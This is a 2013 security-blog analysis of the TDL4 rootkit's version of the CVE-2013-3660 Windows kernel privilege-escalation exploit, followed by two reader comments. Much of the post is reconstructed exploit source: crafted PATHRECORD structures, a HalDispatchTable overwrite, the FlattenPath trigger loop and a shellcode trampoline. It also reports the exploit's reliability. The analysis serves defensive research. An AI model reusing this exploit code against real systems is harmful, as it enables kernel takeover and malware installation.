October 22, 2013 / Vadim Kotov

The latest TDL4 and CVE-2013-3660 exploit enhancements

As a wise man once said, there’s never a dull moment in the security industry. While the world was talking about the recent IE zero day that was doing the rounds, we encountered a variant of the infamous TDL4 rootkit (MD5 = 0e35e0e63fc208873792dd0b7afa90e7) that was rumored to use kernel exploit code made public earlier this year. We would like to reiterate our earlier warning from Bromium Labs: kernel exploits are a huge problem for a lot of security products.

We reverse engineered the TDL4 malware sample and extracted its exploit code. To our surprise, we discovered that the public assumption is not entirely true: there are some crucial differences between the public code and the TDL4 version. Unlike its public counterpart, this exploit takes advantage of the CVE-2013-3660 vulnerability in a more straightforward manner. Before diving into the article, we recommend reading the detailed analysis of the vulnerability and familiarizing yourself with the public exploit code.

Now let’s go through the exploitation steps used in the TDL4 sample. We restored the source code of the exploit and, where applicable, named the variables after their counterparts in the public exploit.

Before the actual exploitation, the TDL4 exploit resolves the necessary routines and addresses, such as NtQueryIntervalProfile and HalDispatchTable. In order to trigger the payload, the exploit requires a chunk of data that is at the same time a valid sequence of opcodes and a valid pointer. The TDL4 authors used the same trick as the public exploit, but changed the opcodes a little (this routine is referred to below as DispatchRedirect):

jmp dword ptr [ebp+0x40]
inc eax
jmp dword ptr [ebp+0x40]
inc ecx
jmp dword ptr [ebp+0x40]
inc edx
jmp dword ptr [ebp+0x40]
inc ebx
jmp dword ptr [ebp+0x40]
inc esi
…

This sequence of instructions can be represented as an array of 4-byte numbers: 0x404065FF, 0x414065FF, 0x424065FF etc. The exploit then makes the first doubleword a legitimate pointer by calling VirtualAlloc:

VirtualAlloc((*DispatchRedirect)&0xFFFFF000,
              0x2000,
              MEM_COMMIT | MEM_RESERVE,
              PAGE_EXECUTE_READWRITE);
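
The arithmetic behind this call can be checked by hand. The sketch below is only an illustration, not code from the sample: the helper names (pack_le32, redirect_entry, page_base, reservation_base) are hypothetical, and the 64 KB figure assumes the usual Windows allocation granularity, to which VirtualAlloc rounds reservation addresses down.

```c
#include <stdint.h>

/* Pack four bytes, given in memory order, into the 32-bit value
 * that a little-endian x86 CPU reads from that location. */
static uint32_t pack_le32(uint8_t b0, uint8_t b1, uint8_t b2, uint8_t b3)
{
    return (uint32_t)b0 | ((uint32_t)b1 << 8) |
           ((uint32_t)b2 << 16) | ((uint32_t)b3 << 24);
}

/* FF 65 40 encodes "jmp dword ptr [ebp+0x40]"; the single byte
 * 0x40 + r encodes "inc r" for eax (0), ecx (1), edx (2), ebx (3). */
static uint32_t redirect_entry(unsigned reg_index)
{
    return pack_le32(0xFF, 0x65, 0x40, (uint8_t)(0x40u + reg_index));
}

/* The mask from the listing: round down to a 4 KB page boundary. */
static uint32_t page_base(uint32_t addr)
{
    return addr & 0xFFFFF000u;
}

/* Assumption: reservations start on a 64 KB allocation boundary. */
static uint32_t reservation_base(uint32_t addr)
{
    return addr & 0xFFFF0000u;
}
```

With these helpers, redirect_entry(0) is 0x404065FF, page_base(0x404065FF) is 0x40406000, and reservation_base(0x40406000) is 0x40400000.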

This commits the memory starting at 0x40400000, making the opcode sequence 0xFF 0x65 0x40 0x40 a valid pointer. Once that is done, the exploit sets up three instances of the PATHRECORD structure. This is the main difference from the public exploit code:

ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = 1;
ExploitRecordExit->count = 0;

ExploitRecord.next = ExploitRecordExit;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable[1];
ExploitRecord.flags = 0x11;
ExploitRecord.count = 4;

PathRecord = VirtualAlloc(NULL, 0x30,
                          MEM_COMMIT|MEM_RESERVE,
                          PAGE_EXECUTE_READWRITE);
memset(PathRecord, 0x90, 0x30);

PathRecord->next = &ExploitRecord;
PathRecord->prev = NULL;
PathRecord->flags = 0;

At this point we have the following layout:

[Figure: Layout of PATHRECORD structures]

The PATHRECORD instances are organized in such a manner that when the vulnerability is triggered, nt!HalDispatchTable+0x4 will be patched with the address of ExploitRecordExit. Let’s look at the details of the vulnerability. If we put a write breakpoint on HalDispatchTable[1], the program will pause in the middle of pprFlattenRec:

kd> ba w 1 nt!HalDispatchTable+0x4
kd> g
Breakpoint 0 hit win32k!EPATHOBJ::pprFlattenRec+0x60

Tracing back through the program flow, we can see that pprFlattenRec creates a new PATHRECORD using win32k!EPATHOBJ::newpathrec and stores its address in ESI. The ExploitRecord (which we control) is held in EDI:

…
mov esi,dword ptr [ebp-4] ; ESI = NewPathRec
… 
mov edi,dword ptr [ebp+8] ; EDI = ExploitRecord
mov eax,dword ptr [edi+4] ; EAX = ExploitRecord.prev
mov dword ptr [esi+4],eax ; NewPathRec.prev = ExploitRecord.prev
…

After some manipulation of the count and flags members, the following code is executed:

…
mov eax, dword ptr [esi+4] ;; EAX = HalDispatchTable+4
mov dword ptr [eax],esi ;; Patch HalDispatchTable+4!

At this point HalDispatchTable+4 contains the address of NewPathRec. The next pointer of NewPathRec is initialized to zero here, and later in the function it receives the next pointer of ExploitRecord, i.e. ExploitRecordExit:

…
mov edi, dword ptr[edi] ; EDI = ExploitRecord.next = ExploitRecordExit
mov dword ptr[esi], edi ; NewPathRec.next = 0x404065FF
…

So HalDispatchTable+4 points at a valid sequence of opcodes. This condition allows us to trigger the shellcode by calling NtQueryIntervalProfile, which at some point calls through the pointer at nt!HalDispatchTable+4.

Now let’s look at how the vulnerability condition is triggered. Similar to the public exploit, the TDL variant generates a huge number of Point objects:

for(PointNum = 0; PointNum < 0x7C80; PointNum++)
{
    Points[PointNum].x = (ULONG)(PathRecord)>>4;
    Points[PointNum].y = (ULONG)(PathRecord)>>4;
    PointTypes[PointNum] = 4;
}
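
The right shift by 4 is not explained in the sample itself. A plausible reading, stated here as an assumption, is that GDI stores path coordinates internally as 28.4 fixed-point values, so a coordinate is scaled by 16 on its way into a PATHRECORD and the original pointer value reappears. The helpers below are hypothetical and only demonstrate that the round trip is lossless when the low four bits of the address are zero, which holds for any address returned by VirtualAlloc(NULL, ...).

```c
#include <stdint.h>

/* What the loop stores in Points[].x and Points[].y. */
static uint32_t to_point_coord(uint32_t addr)
{
    return addr >> 4;
}

/* Assumption: the coordinate is scaled by 16 (28.4 fixed point). */
static uint32_t from_point_coord(uint32_t coord)
{
    return coord << 4;
}

/* Returns 1 when the address survives the shift pair unchanged,
 * i.e. when its low four bits are zero. */
static int survives_round_trip(uint32_t addr)
{
    return from_point_coord(to_point_coord(addr)) == addr;
}
```

For example, survives_round_trip(0x00A30000) holds, while an address such as 0x00A30008 would lose its low bits.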

Next, it enters the 5-step loop, where the actual exploitation occurs. First, it draws the curves using the Points array and creates a compatible device context:

if(hdc == NULL)
{
    BeginPath(Device);
    PolyDraw(Device, Points, PointTypes, 0x1F2);
    EndPath(Device);
    BeginPath(Device);
    PolyDraw(Device, Points, PointTypes, 0x1E3);
    EndPath(Device);
    hdc = CreateCompatibleDC(Device);
}

Now that the curves are drawn, it calls the vulnerable function FlattenPath. Before that, however, it creates some memory pressure (by calling CauseFailure()) and then cleans up the created objects.

BeginPath(hdc);
if( !PolyDraw(hdc, Points, PointTypes, PointNum*0x1F2) )
{
    EndPath(hdc);
}
else
{
    EndPath(hdc);
    CauseFailure();
    FlattenPath(Device);
    Cleanup();
    FlattenPath(Device);

    lpAddress = VirtualAlloc(NULL, 5,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    *lpAddress = 0xE9;
    *(DWORD *)(lpAddress+1) = (DWORD)(ShellCode) - (DWORD)(lpAddress) - 5;
    NtQueryIntervalProfile(2, (PULONG)lpAddress);
    VirtualFree(lpAddress, 0, 0x8000);

    if(Finished)break;

    DeleteDC(hdc);
    hdc = NULL;
    Sleep(0x64);
}

The lpAddress variable is a buffer used as a trampoline to jump to the shellcode. The exploit writes 0xE9 followed by [ShellCodeAddress - lpAddress - 5], which encodes a “jmp ShellCode” instruction. Shellcode execution is triggered by calling NtQueryIntervalProfile. At this moment nt!HalDispatchTable+0x4 points at memory that begins with the doubleword 0x404065FF, which, translated to processor instructions, gives us jmp [ebp+0x40], inc eax. The jump leads to the shellcode trampoline, which in turn launches the actual shellcode.
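
The displacement formula follows from how the x86 near jump (opcode 0xE9) is encoded: the 32-bit operand is relative to the address of the next instruction, which lies 5 bytes past the start of the jump. The following is a generic illustration of that encoding with hypothetical helper names; it writes into an ordinary byte array and is not taken from the sample.

```c
#include <stdint.h>

#define JMP_REL32_LEN 5u  /* one opcode byte plus a 4-byte displacement */

/* Displacement for a jump located at 'from' that should land on 'to'.
 * Unsigned wrap-around yields the two's-complement value for
 * backward jumps. */
static uint32_t rel32_displacement(uint32_t from, uint32_t to)
{
    return to - from - JMP_REL32_LEN;
}

/* Emit the 5-byte encoding: E9 followed by the little-endian disp32. */
static void encode_jmp_rel32(uint8_t out[5], uint32_t from, uint32_t to)
{
    uint32_t disp = rel32_displacement(from, to);

    out[0] = 0xE9;
    out[1] = (uint8_t)(disp & 0xFFu);
    out[2] = (uint8_t)((disp >> 8) & 0xFFu);
    out[3] = (uint8_t)((disp >> 16) & 0xFFu);
    out[4] = (uint8_t)((disp >> 24) & 0xFFu);
}
```

A jump at 0x1000 targeting 0x2000 gets the displacement 0xFFB and the bytes E9 FB 0F 00 00; a backward jump from 0x2000 to 0x1000 gets 0xFFFFEFFB.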

The CauseFailure function repeatedly calls CreateCompatibleBitmap for the in-memory device context. RegionSize is a global variable initialized to 0.

void CauseFailure()
{
    HDC hdc;
    int Size;

    NumRegion = 0;
    hdc = CreateCompatibleDC(NULL);
    for(Size=0x400000; Size; Size>>=2)
    {
        while(Regions[NumRegion] = CreateCompatibleBitmap(hdc, Size, Size))
        {
            NumRegion++;
            if(NumRegion>=RegionSize)
            {
                RegionSize*=2;
                Regions = realloc(Regions, RegionSize*4);
            }
        }
    }
}

Then Cleanup simply removes all the objects created:

void Cleanup()
{
    while(NumRegion--)
    {
        DeleteObject(Regions[NumRegion]);
    }
}

Altogether, this provides a remarkably stable way to run the payload in kernel space. We observed almost 100% stability of this exploit on Windows 7+, although crashes are occasionally possible, especially with repeated use. The TDL4 sample makes two attempts to exploit the system, but in most cases one is enough.

In short, the version of the CVE-2013-3660 exploit embedded in TDL4 is far more lethal than the public exploit code, and further exploitation of this issue is likely.

2 Comments

  1. Jared DeMott / Oct 31 2013 4:49 am

    I like this quote from the original write-up: “It turns out, getting an object from the freelist happens quite rarely, so the few cases that don’t initialize their path object have survived over 20 years in NT.” — If the data there is reliable, makes me wonder how many other bugs are that old and can survive that long?

  2. Jared DeMott / Oct 31 2013 6:24 am

    One of the other things that’s interesting: I recall a time when kernel exploitation was like dark black magic that very few understood. Nowadays, that doesn’t seem to be as true. That shift has probably happened for a few reasons:
    1. “Normal” browser exploitation is now just as, if not more, complicated — because of all the modern protections. And actually, I see a lot of similarities. Via java scripting and RWX bugs, there’s a need to know the location, setup memory, etc for exploitation — in both browser and kernel bugs.
    2. Kernel exploitation is a preferred (in some cases necessary) way to escape sandboxes.
    3. “Typical” (lol – no not grandma) exploit writer abilities have caught up to the ability of kernel exploitation.
